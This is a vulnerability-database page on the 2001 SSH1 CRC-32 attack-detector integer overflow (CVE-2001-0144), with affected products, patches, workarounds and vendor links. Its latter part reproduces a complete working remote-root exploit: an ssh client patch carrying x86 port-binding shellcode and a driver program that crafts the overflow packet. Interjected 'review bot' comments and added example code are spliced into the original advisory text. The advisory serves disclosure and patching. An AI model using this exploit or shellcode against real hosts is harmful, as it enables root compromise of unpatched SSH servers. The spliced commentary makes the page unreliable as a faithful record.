CVE-2001-0144
CVSS 10.0
Published: 2001-03-12 00:00:00
Last revised: 2016-10-17 22:10:01

[Original] CORE SDI SSH1 CRC-32 compensation attack detector allows remote attackers to execute arbitrary commands on an SSH server or client via an integer overflow.


[CNNVD] SSH1 daemon CRC32 compensation attack detection vulnerability (CNNVD-200103-069)

        
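        SSH is an encrypted communication protocol and tool for remote connections; it provides far stronger security than telnet.
        A piece of code shipped with newer versions of the ssh1 daemon contains an integer overflow. The problem is in deattack.c, which was developed by CORE SDI to protect the SSH1 protocol against the CRC32 compensation attack.
        Because detect_attack() mistakenly uses a 16-bit unsigned variable as if it were a 32-bit variable, a table index overflow results. This allows an attacker to overwrite the contents of arbitrary memory locations, and the attacker may gain root privileges remotely.
        The problem is in the detect_attack() function: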
        ...
        /*
         detect_attack
         Detects a crc32 compensation attack on a packet
        */
        int
        detect_attack(unsigned char *buf, word32 len, unsigned char *IV)
        {
         static word16 *h = (word16 *) NULL;
        (*) static word16 n = HASH_MINSIZE / HASH_ENTRYSIZE;
         register word32 i, j;
         word32 l;
        ...
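        n is wrongly declared as a 16-bit integer, so an attacker can arrange for its value to become 0. After the resulting xmalloc(0) allocation, the following code is executed: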
         for (i = HASH(c) & (n - 1); h[i] != HASH_UNUSED;
        Because i is a 32-bit unsigned integer, when n=0 the expression becomes:
        i = HASH(c) & 0xffffffff
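        and c can be supplied by the client. If the value of i is outside the normal range, the program hits a segmentation fault when it tries to access h[i].
        With a carefully constructed attack packet, an attacker may overwrite the contents of an arbitrary address and execute arbitrary code remotely. The attacker does not need a valid system account to carry out the attack.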
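The truncation described above can be reproduced in isolation. The following C program is an added example, not code from deattack.c or from this entry; the constants, the simplified sizing loop and the MAX_LEN cap are assumptions, and the lengths are constructed.

```c
#include <stdint.h>
#include <stdio.h>

/* Assumed values modelled on deattack.c; they are not quoted on this page. */
#define SSH_BLOCKSIZE   8u
#define HASH_MINSIZE    (8u * 1024u)
#define HASH_ENTRYSIZE  2u                  /* one 16-bit table entry */
#define HASH_FACTOR(x)  ((x) * 3u / 2u)
#define MAX_LEN         (32u * 1024u * SSH_BLOCKSIZE)  /* hypothetical cap */

/* Entry count the table grows to for a packet of len bytes (simplified model). */
static uint32_t wanted_entries(uint32_t len)
{
    uint32_t l = HASH_MINSIZE / HASH_ENTRYSIZE;
    while (l < HASH_FACTOR(len / SSH_BLOCKSIZE))
        l <<= 2;
    return l;
}

/* Vulnerable form: the count is stored in a 16-bit n, so 65536 becomes 0. */
static uint32_t mask_with_n16(uint32_t len)
{
    uint16_t n = (uint16_t)wanted_entries(len);
    return (uint32_t)(n - 1);   /* n == 0 gives 0xffffffff: no masking at all */
}

/* Patched form: n is 32 bits wide, so the mask stays inside the table. */
static uint32_t mask_with_n32(uint32_t len)
{
    uint32_t n = wanted_entries(len);
    return n - 1;
}

/* Added hardening: also reject oversized or unaligned lengths up front. */
static int len_is_acceptable(uint32_t len)
{
    return len != 0 && len <= MAX_LEN && len % SSH_BLOCKSIZE == 0;
}

int main(void)
{
    const uint32_t lens[] = { 1024u, 88000u, 400000u };  /* constructed */
    for (unsigned k = 0; k < sizeof lens / sizeof lens[0]; k++)
        printf("len=%u n16 mask=0x%08x n32 mask=0x%08x ok=%d\n",
               (unsigned)lens[k], (unsigned)mask_with_n16(lens[k]),
               (unsigned)mask_with_n32(lens[k]), len_is_acceptable(lens[k]));
    return 0;
}
```

With the 16-bit n the mask degenerates to all ones as soon as the wanted entry count reaches 65536, which is the i = HASH(c) & 0xffffffff case in the text; the 32-bit n keeps the mask at table size minus one.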
        

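- CVSS (base score)

CVSS score: 10 [Severe (HIGH)]
Confidentiality impact: [--]
Integrity impact: [--]
Availability impact: [--]
Attack complexity: [--]
Attack vector: [--]
Authentication: [--]

- CPE (affected platforms and products)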

cpe:/a:openbsd:openssh:2.1  OpenBSD OpenSSH 2.1
cpe:/a:openbsd:openssh:2.2  OpenBSD OpenSSH 2.2
cpe:/a:ssh:ssh:1.2.30  SSH Communications Security SSH daemon 1.2.30
cpe:/a:ssh:ssh:1.2.31  SSH Communications Security SSH daemon 1.2.31
cpe:/a:openbsd:openssh:1.2.3  OpenBSD OpenSSH 1.2.3
cpe:/a:ssh:ssh:1.2.24  SSH Communications Security SSH daemon 1.2.24
cpe:/a:ssh:ssh:1.2.27  SSH Communications Security SSH daemon 1.2.27
cpe:/a:ssh:ssh:1.2.28  SSH Communications Security SSH daemon 1.2.28
cpe:/a:ssh:ssh:1.2.25  SSH Communications Security SSH daemon 1.2.25
cpe:/a:openbsd:openssh:2.1.1  OpenBSD OpenSSH 2.1.1
cpe:/a:ssh:ssh:1.2.26  SSH Communications Security SSH daemon 1.2.26
cpe:/a:openbsd:openssh:1.2.2  OpenBSD OpenSSH 1.2.2
cpe:/a:ssh:ssh:1.2.29  SSH Communications Security SSH daemon 1.2.29

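- OVAL (technical details for detection)

oval:org.mitre.oval:def:5397  Multiple Vendor SSH Buffer Overflow Vulnerability
*OVAL describes in detail how to detect this vulnerability; further technical details for detecting it can be found in the related OVAL definition.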

- Official database links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0144
(official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2001-0144
(official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200103-069
(official data source) CNNVD

- Other links and resources

http://marc.info/?l=bugtraq&m=98168366406903&w=2
(UNKNOWN)  BUGTRAQ  20010208 [CORE SDI ADVISORY] SSH1 CRC-32 compensation attack detector
http://razor.bindview.com/publish/advisories/adv_ssh1crc.html
(VENDOR_ADVISORY)  BINDVIEW  20010208 Remote vulnerability in SSH daemon crc32 compensation attack detector
http://www.cert.org/advisories/CA-2001-35.html
(UNKNOWN)  CERT  CA-2001-35
http://www.securityfocus.com/bid/2347
(VENDOR_ADVISORY)  BID  2347
http://xforce.iss.net/static/6083.php
(UNKNOWN)  XF  ssh-deattack-overwrite-memory(6083)

- Vulnerability information

SSH1 daemon CRC32 compensation attack detection vulnerability
Critical  Unknown
2001-03-12 00:00:00 2006-09-05 00:00:00
Remote
        
        

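- Advisories and patches

        Workarounds:
        If you cannot install a patch or upgrade immediately, CNNVD recommends the following measures to reduce the threat:
        * If you are running SSH2 with SSH1 compatibility enabled, CNNVD recommends temporarily disabling SSH1.
        * Michal Zalewski (lcamtuf@razor.bindview.com) has also provided the following temporary patches: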
        SSH1 software:
        8<---------------------patch for ssh-1.2.31---------------------------
        --- deattack.c.orig Wed Feb 7 13:53:47 2001
        +++ deattack.c Wed Feb 7 13:54:24 2001
        @@ -79,7 +79,7 @@
        detect_attack(unsigned char *buf, word32 len, unsigned char *IV)
        {
         static word16 *h = (word16 *) NULL;
        - static word16 n = HASH_MINSIZE / HASH_ENTRYSIZE;
        + static word32 n = HASH_MINSIZE / HASH_ENTRYSIZE;
         register word32 i, j;
         word32 l;
         register unsigned char *c;
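        Review bot: widening n on the changed line removes the truncation, but the table pointer one line above is still "static word16 *h" and nothing in this hunk bounds len. Suggest rejecting an oversized len at the top of detect_attack(), before n is recomputed, so the fix does not rest on the width of n alone.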
        8<---------------------patch for ssh-1.2.31---------------------------
        Bjoern Groenvall's ossh (ftp://ftp.pdc.kth.se/pub/krypto/ossh/):
        8<---------------------patch for ossh-1.5.7---------------------------
        --- deattack.c.orig Wed Feb 7 14:11:23 2001
        +++ deattack.c Wed Feb 7 14:11:46 2001
        @@ -91,7 +91,7 @@
        detect_attack(const unsigned char *buf, word32 len)
        {
         static u_int16_t *h = (u_int16_t *) NULL;
        - static u_int16_t n = HASH_MINSIZE / HASH_ENTRYSIZE;
        + static u_int32_t n = HASH_MINSIZE / HASH_ENTRYSIZE;
         register word32 i, j;
         word32 l;
         const unsigned char *c, *d;
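        Review bot: the changed declaration uses u_int32_t while the two lines after it declare i, j and l as word32, so one function now mixes two spellings of the same 32-bit type and hides the fact that n has to match their width. Suggest declaring n as word32 here (or converting all of them) and adding a comment that n must never be narrower than len.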
        8<---------------------patch for ossh-1.5.7---------------------------
        OpenSSH 2.2.0:
        8<-------------------patch for openssh-2.2.0--------------------------
        --- deattack.c.orig Wed Feb 7 14:18:23 2001
        +++ deattack.c Wed Feb 7 14:19:33 2001
        @@ -84,7 +84,7 @@
        detect_attack(unsigned char *buf, u_int32_t len, unsigned char *IV)
        {
         static u_int16_t *h = (u_int16_t *) NULL;
        - static u_int16_t n = HASH_MINSIZE / HASH_ENTRYSIZE;
        + static u_int32_t n = HASH_MINSIZE / HASH_ENTRYSIZE;
         register u_int32_t i, j;
         u_int32_t l;
         register unsigned char *c;
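        Review bot: n is static, so a bad value persists across calls, and the loop quoted earlier in this entry masks with (n - 1); the changed declaration is the only place the required width is recorded and it carries no comment. Suggest a comment on that line stating that n must be as wide as len, plus a check that n is non-zero before it is used as a mask.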
        8<-------------------patch for openssh-2.2.0--------------------------
        Vendor patches:
        Debian
        ------
        Debian has released a security advisory (DSA-027-1) and corresponding patches for this issue:
        DSA-027-1: New OpenSSH packages released
        Link:
        http://www.debian.org/security/2001/dsa-027

        Patch downloads:
        Source archives:
        
        http://security.debian.org/dists/stable/updates/main/source/openssh_1.2.3-9.2.diff.gz

        
        http://security.debian.org/dists/stable/updates/main/source/openssh_1.2.3-9.2.dsc

        
        http://security.debian.org/dists/stable/updates/main/source/openssh_1.2.3.orig.tar.gz

        Intel ia32 architecture:
        
        http://security.debian.org/dists/stable/updates/main/binary-i386/ssh-askpass-gnome_1.2.3-9.2_i386.deb

        
        http://security.debian.org/dists/stable/updates/main/binary-i386/ssh_1.2.3-9.2_i386.deb

        Motorola 680x0 architecture:
        
        http://security.debian.org/dists/stable/updates/main/binary-m68k/ssh-askpass-gnome_1.2.3-9.2_m68k.deb

        
        http://security.debian.org/dists/stable/updates/main/binary-m68k/ssh_1.2.3-9.2_m68k.deb

        Sun Sparc architecture:
        
        http://security.debian.org/dists/stable/updates/main/binary-sparc/ssh_1.2.3-9.2_sparc.deb

        
        http://security.debian.org/dists/stable/updates/main/binary-sparc/ssh-askpass-gnome_1.2.3-9.2_sparc.deb

        Alpha architecture:
        
        http://security.debian.org/dists/stable/updates/main/binary-alpha/ssh-askpass-gnome_1.2.3-9.2_alpha.deb

        
        http://security.debian.org/dists/stable/updates/main/binary-alpha/ssh_1.2.3-9.2_alpha.deb

        PowerPC architecture:
        
        http://security.debian.org/dists/stable/updates/main/binary-p

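        How to install the patches:
        1. Install the patch package manually:
         First, download the patch package with the following command:
         # wget url (url is the patch download link)
         Then install the patch with the following command:
         # dpkg -i file.deb (file is the name of the patch package)
        2. Install the patch packages automatically with apt-get:
         First, update the internal database with the following command:
         # apt-get update
        
         Then install the updated packages with the following command:
         # apt-get upgrade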
        OpenSSH
        -------
        The vendor has released an upgrade patch that fixes this security issue; download it from the vendor's home page:
        
        http://www.openssh.com/

        SSH Communications Security
        ---------------------------
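        The vendor has fixed this vulnerability in the latest version of the software. SSH Communications Security recommends upgrading to version 2.x and disabling SSH1 compatibility; download the latest version from the following site: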
        
        http://www.ssh.com

- Vulnerability information (349)

SSH (x2) Remote Root Exploit (EDBID:349)
multiple remote
2002-05-01 Verified
22 Teso
N/A [click to download]
http://www.exploit-db.com/sploits/x2.tgz

# milw0rm.com [2002-05-01]
		

- Vulnerability information (20617)

SSH 1.2.x CRC-32 Compensation Attack Detector Vulnerability (EDBID:20617)
unix remote
2001-02-08 Verified
0 Michal Zalewski
N/A [click to download]
source: http://www.securityfocus.com/bid/2347/info

Secure Shell, or SSH, is an encrypted remote access protocol. SSH or code based on SSH is used by many systems all over the world and in a wide variety of commercial applications. An integer-overflow bug in the CRC32 compensation attack detection code may allow remote attackers to write values to arbitrary locations in memory.

This would occur in situations where large SSH packets are received by either a client or server, and a 32 bit representation of the SSH packet length is assigned to a 16 bit integer. The difference in data representation in these situations will cause the 16 bit variable to be assigned to zero (or a really low value).

As a result, future calls to malloc() as well as an index used to reference locations in memory can be corrupted by an attacker. This could occur in a manner that can be exploited to write certain numerical values to almost arbitrary locations in memory.

This can lead to an attacker executing arbitrary code with the privileges of the SSH server (usually root) or the SSH client.

**UPDATE**:

There have been reports suggesting that exploitation of this vulnerability may be widespread.

Since early September, independent, reliable sources have confirmed that this vulnerability is being exploited by attackers on the Internet. Security Focus does not currently have the exploit code being used, however this record will be updated if and when it becomes available.

NOTE: Cisco 11000 Content Service Switch family is vulnerable to this issue. All WebNS releases prior, but excluding, versions: 4.01 B42s, 4.10 22s, 5.0 B11s, 5.01 B6s, are vulnerable.

Secure Computing SafeWord Agent for SSH is reportedly prone to this issue, as it is based on a vulnerable version of SSH.

** NetScreen ScreenOS is not directly vulnerable to this issue, however the referenced exploit will cause devices using vulnerable versions of the software to stop functioning properly. This will result in a denial of service condition for NetScreen devices. This issue is in the Secure Command Shell (SCS) administrative interface, which is an implementation of SSHv1. SCS is not enabled on NetScreen devices by default. 

# Exploit code in the form of ssh client patches by Hugo Dias < bsphere@clix.pt >.

- --- packet.c Sat Oct 14 06:23:12 2000
+++ packet.c Tue Feb 20 09:33:00 2001
@@ -68,6 +68,85 @@
 #define DBG(x)
 #endif
 
+
+/*
+ *  Linux/x86
+ *  TCP/36864 portshell (old, could be optimized further)
+ */
+
+char shellcode[] = /* anathema <anathema@hack.co.za> */
+/* main: */
+"\xeb\x72"                                /* jmp callz               */
+/* start: */
+"\x5e"                                    /* popl %esi               */
+
+  /* socket() */
+"\x29\xc0"                                /* subl %eax, %eax         */
+"\x89\x46\x10"                            /* movl %eax, 0x10(%esi)   */
+"\x40"                                    /* incl %eax               */
+"\x89\xc3"                                /* movl %eax, %ebx         */
+"\x89\x46\x0c"                            /* movl %eax, 0x0c(%esi)   */
+"\x40"                                    /* incl %eax               */
+"\x89\x46\x08"                            /* movl %eax, 0x08(%esi)   */
+"\x8d\x4e\x08"                            /* leal 0x08(%esi), %ecx   */
+"\xb0\x66"                                /* movb $0x66, %al         */
+"\xcd\x80"                                /* int $0x80               */
+
+  /* bind() */
+"\x43"                                    /* incl %ebx               */
+"\xc6\x46\x10\x10"                        /* movb $0x10, 0x10(%esi)  */
+"\x66\x89\x5e\x14"                        /* movw %bx, 0x14(%esi)    */
+"\x88\x46\x08"                            /* movb %al, 0x08(%esi)    */
+"\x29\xc0"                                /* subl %eax, %eax         */
+"\x89\xc2"                                /* movl %eax, %edx         */
+"\x89\x46\x18"                            /* movl %eax, 0x18(%esi)   */
+"\xb0\x90"                                /* movb $0x90, %al         */
+"\x66\x89\x46\x16"                        /* movw %ax, 0x16(%esi)    */
+"\x8d\x4e\x14"                            /* leal 0x14(%esi), %ecx   */
+"\x89\x4e\x0c"                            /* movl %ecx, 0x0c(%esi)   */
+"\x8d\x4e\x08"                            /* leal 0x08(%esi), %ecx   */
+"\xb0\x66"                                /* movb $0x66, %al         */
+"\xcd\x80"                                /* int $0x80               */
+
+  /* listen() */
+"\x89\x5e\x0c"                            /* movl %ebx, 0x0c(%esi)   */
+"\x43"                                    /* incl %ebx               */
+"\x43"                                    /* incl %ebx               */
+"\xb0\x66"                                /* movb $0x66, %al         */
+"\xcd\x80"                                /* int $0x80               */
+
+  /* accept() */
+"\x89\x56\x0c"                            /* movl %edx, 0x0c(%esi)   */
+"\x89\x56\x10"                            /* movl %edx, 0x10(%esi)   */
+"\xb0\x66"                                /* movb $0x66, %al         */
+"\x43"                                    /* incl %ebx               */
+"\xcd\x80"                                /* int $0x80               */
+
+  /* dup2(s, 0); dup2(s, 1); dup2(s, 2); */
+"\x86\xc3"                                /* xchgb %al, %bl          */
+"\xb0\x3f"                                /* movb $0x3f, %al         */
+"\x29\xc9"                                /* subl %ecx, %ecx         */
+"\xcd\x80"                                /* int $0x80               */
+"\xb0\x3f"                                /* movb $0x3f, %al         */
+"\x41"                                    /* incl %ecx               */
+"\xcd\x80"                                /* int $0x80               */
+"\xb0\x3f"                                /* movb $0x3f, %al         */
+"\x41"                                    /* incl %ecx               */
+"\xcd\x80"                                /* int $0x80               */
+
+  /* execve() */
+"\x88\x56\x07"                            /* movb %dl, 0x07(%esi)    */
+"\x89\x76\x0c"                            /* movl %esi, 0x0c(%esi)   */
+"\x87\xf3"                                /* xchgl %esi, %ebx        */
+"\x8d\x4b\x0c"                            /* leal 0x0c(%ebx), %ecx   */
+"\xb0\x0b"                                /* movb $0x0b, %al         */
+"\xcd\x80"                                /* int $0x80               */
+
+/* callz: */
+"\xe8\x89\xff\xff\xff"                    /* call start              */
+"/bin/sh";
+
+
 /*
  * This variable contains the file descriptors used for communicating with
  * the other side.  connection_in is used for reading; connection_out for
@@ -125,6 +204,9 @@
 /* Session key information for Encryption and MAC */
 Kex *kex = NULL;
 
+/* Packet Number */
+int count = 0;
+
 void
 packet_set_kex(Kex *k)
 {
@@ -461,6 +543,8 @@
  unsigned int checksum;
  u_int32_t rand = 0;
 
+ count++;
+
  /*
   * If using packet compression, compress the payload of the outgoing
   * packet.
@@ -1172,7 +1256,64 @@
 void
 packet_write_poll()
 {
- - int len = buffer_len(&output);
+ int len;
+ char buf[50],*p,*ptr;
+ char code[270000];
+ long sz;
+ FILE *f; 
+
+ if (count == 2)
+ {
+  f = fopen("/tmp/code","r");
+  fgets(buf,28,f); 
+  fclose(f);  
+
+  sz = GET_32BIT(&buf[24]);
+  buffer_clear(&output);
+  buffer_append(&output,code,sz); 
+ 
+  len = buffer_len(&output);
+
+    ptr = buffer_ptr(&output); 
+
+  for(p = ptr + 4 ; p < ptr + GET_32BIT(&buf[16]) ; p+=8)
+  {
+  *p=buf[0];
+  *(p+1)=buf[1];
+  *(p+2)=buf[2];
+  *(p+3)=buf[3];
+  *(p+4)=buf[4];
+  *(p+5)=buf[5];
+  *(p+6)=buf[6];
+  *(p+7)=buf[7];
+  }
+
+  sz = ((GET_32BIT(&buf[20]) + 8) & ~7);
+
+  for(p = p ; p < ptr + sz ; p+=8)
+  {
+  *p=buf[8];
+  *(p+1)=buf[9];
+  *(p+2)=buf[10];
+  *(p+3)=buf[11];
+  *(p+4)=buf[12];
+  *(p+5)=buf[13];
+  *(p+6)=buf[14];
+  *(p+7)=buf[15];
+  }
+
+  sz = len - GET_32BIT(&buf[20]);
+ 
+  memset(p,'\x90',sz);
+  memcpy(p+sz-strlen(shellcode)-16,&shellcode,strlen(shellcode));
+  memcpy(ptr,&buf[20],4); 
+
+  count++;
+ }
+
+ len = buffer_len(&output);
+
+
  if (len > 0) {
   len = write(connection_out, buffer_ptr(&output), len);
   if (len <= 0) {
@@ -1299,3 +1440,4 @@
  max_packet_size = s;
  return s;
 }
+

- ------------------------------------------------------------------------------------

/* 

THIS FILE IS FOR EDUCATIONAL PURPOSE ONLY.

BlackSphere - Hugo Oliveira Dias
Tue Feb 20 16:18:00 2001

Email: bsphere@clix.pt
Homepage: http://planeta.clix.pt/bsphere

Exploit code for using the modified ssh

*/
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>

/* Path to modified ssh */
#define PATH_SSH "./ssh"

int main(int argc,char *argv[])
{
 int f;
 int port;
 unsigned long addr,*ptr;
 char *buffer,*aux,ch,*ssh;
 int i;

 if (argc < 8)
 {
  printf("\nUsage : %s <saved eip> <count> <packet length> <username length> <host> \
<port> <h(i)>\n\n",argv[0]);
 
  fflush(stdout);
  _exit(0);
 }

 port=atoi(argv[6]);

 buffer = (char *) malloc(29);

 ptr = (unsigned long *) buffer;

 *(ptr++) = 1543007393 + strtoul(argv[1],0,10);
 *(ptr++) = 0;
 *(ptr++) = strtoul(argv[7],0,10);
 *(ptr++) = 0;
 *(ptr++) = 16520 + strtoul(argv[2],0,10);
 *(ptr++) = strtoul(argv[3],0,10);
 *(ptr++) = strtoul(argv[4],0,10);

 buffer[29]=0;

 for(i = 0 ; i < 27 ; i+=4)
 {
  aux = buffer + i;
  ch=*aux;
  *aux=*(aux+3);
  *(aux+3)=ch;
  ch=*(aux+1);
  *(aux+1)=*(aux+2);
  *(aux+2)=ch; 
 } 

 printf("\nSaved Eip : &h + %u",1543007393 + strtoul(argv[1],0,10));
 printf("\nReturn Address : 0x%xxxxx",(16520+strtoul(argv[2],0,10))/8);
 printf("\nPacket Length : %u",(strtoul(argv[3],0,10)+8) & ~7);
 printf("\nUsername Length : %u\n\n",strtoul(argv[4],0,10));
 fflush(stdout);
 

 f = open("/tmp/code",O_RDWR | O_CREAT,S_IRWXU);
 write(f,buffer,28);
 close(f);

 ssh = (char *) malloc(strlen(PATH_SSH) + 100 + strlen(argv[5]));

 strcpy(ssh,PATH_SSH);

 sprintf(ssh+strlen(PATH_SSH)," -p %i -v -l root %s",port,argv[5]);
 
 printf("%s\n",ssh);

 system(ssh);

 _exit(0); 
}


		

- Vulnerability information

795
Multiple Vendor SSH CRC-32 detect_attack() Function Overflow
Remote / Network Access Input Manipulation
Loss of Integrity
Exploit Public

- Vulnerability description

A remote overflow exists in SSH and OpenSSH and derived products. The implementation of SSH protocol version 1.5 fails to correctly calculate the range within deattack.c's detect_attack function, resulting in an integer overflow. With a specially crafted request, an attacker can cause execution of arbitrary code as UID 0, resulting in a loss of confidentiality, integrity, and/or availability.

- Timeline

2001-02-08 Unknown
2001-02-21 Unknown

- Solution

Upgrade to the appropriate version from your vendor; you must contact your vendor for the fixed version. It is usually also possible to correct the flaw by disabling support for version 1 of the SSH protocol in your configuration. Again, exact details will vary from vendor to vendor.

- Related references

- Vulnerability author

 

 
